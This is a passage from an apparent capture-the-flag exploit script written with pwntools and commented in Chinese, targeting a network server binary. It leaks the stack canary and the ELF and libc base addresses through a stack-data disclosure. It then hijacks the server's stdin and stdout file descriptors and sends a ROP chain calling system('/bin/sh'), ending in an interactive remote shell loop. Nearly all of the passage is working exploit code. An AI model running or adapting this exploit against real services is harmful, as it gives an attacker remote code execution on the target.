  # l_linger = 0
  # 这里可以写struct.pack("ii", l_onoff, l_linger) 在64位机器上通常是 8 字节,符合 p32(1)+p32(0)
  s1.sock.setsockopt(
    socket.SOL_SOCKET, socket.SO_LINGER,p32(1)+p32(0) 
  )
  s1.sock.close()
  CLEAR_TEXT("s1 closed with RST")

  # 3. 接收并解析 Leak 数据
  # 服务端会将栈上0x100字节数据发送回来,其中包含了 Canary 和 libc 地址
  try:
    leak_data = s4.recv(0x100)
   
  #  stop("fd 4-->1")
    if len(leak_data) < 0x90:
      log.error(f"Leak failed, received len: {len(leak_data)}")
      return

    canary = u64(leak_data[0x48:0x50])
    CLEAR_TEXT(f"Canary: {hex(canary)}")
   
    elf_base = u64(leak_data[0x58:0x60]) - 0x147e
    CLEAR_TEXT(f"ELF Base: {hex(elf_base)}")

    libc_base = u64(leak_data[0x88:0x90]) - 0x9c720 - 900
    CLEAR_TEXT(f"Libc Base: {hex(libc_base)}")
    libc.address = libc_base

  except EOFError:
    log.error("Unexpected EOF during leak")
    return

  # 4. Get Shell 
  # 通过覆盖实现 关闭 fd 0 和 1 
  s_temp = start_con()
  s_temp.send(p64(0x100))
  s_temp.send(b"\x00"*0x7c + p32(0))
  time.sleep(0.1)
  s_temp.close() # 保持连接

  s_temp2 = start_con()
  s_temp2.send(p64(0x100))
  s_temp2.send(b"\x00"*0x7c + p32(1))
  time.sleep(0.1)
  s_temp2.close()

  # 服务端重新accept了连接分配到了 fd=0, fd=1
  # 这样我们就能控制 stdin/stdout
  ret_addr=elf_base+0x101a,
  stdin_sock = start_con() 
  stdout_sock = start_con() 
 
  VIO_TEXT("Sending ROP chain...")
 
  payload = b"A" * 0x48
  payload += flat([
    canary,
    0xdeadbeef,
    libc.search(asm('pop rdi; ret')).__next__(), 
    libc.search(b"/bin/sh").__next__(),
    ret_addr,
    libc.sym['system']
  ])
  stdin_sock.send(p64(len(payload)))
  time.sleep(0.1)
  stdin_sock.send(payload)
 
  time.sleep(0.1)
  stdin_sock.sendline(b"ls")
  print(stdout_sock.recv(4096))
  def listner():
    while True:
        try:
            print("\n")
            data = stdout_sock.recv(4096)
            if data:
                sys.stdout.buffer.write(data)
                sys.stdout.flush()
        except exception:
            pass 
  t=threading.Thread(target=listner,daemon=True)
  t.start()
  while True:
    cmd = input("[nan0in27 sh]$ ")
    stdin_sock.sendline(cmd.encode())
  #   print(stdout_sock.recv().decode(errors='ignore'))

if __name__ == "__main__":
  main()

still in updating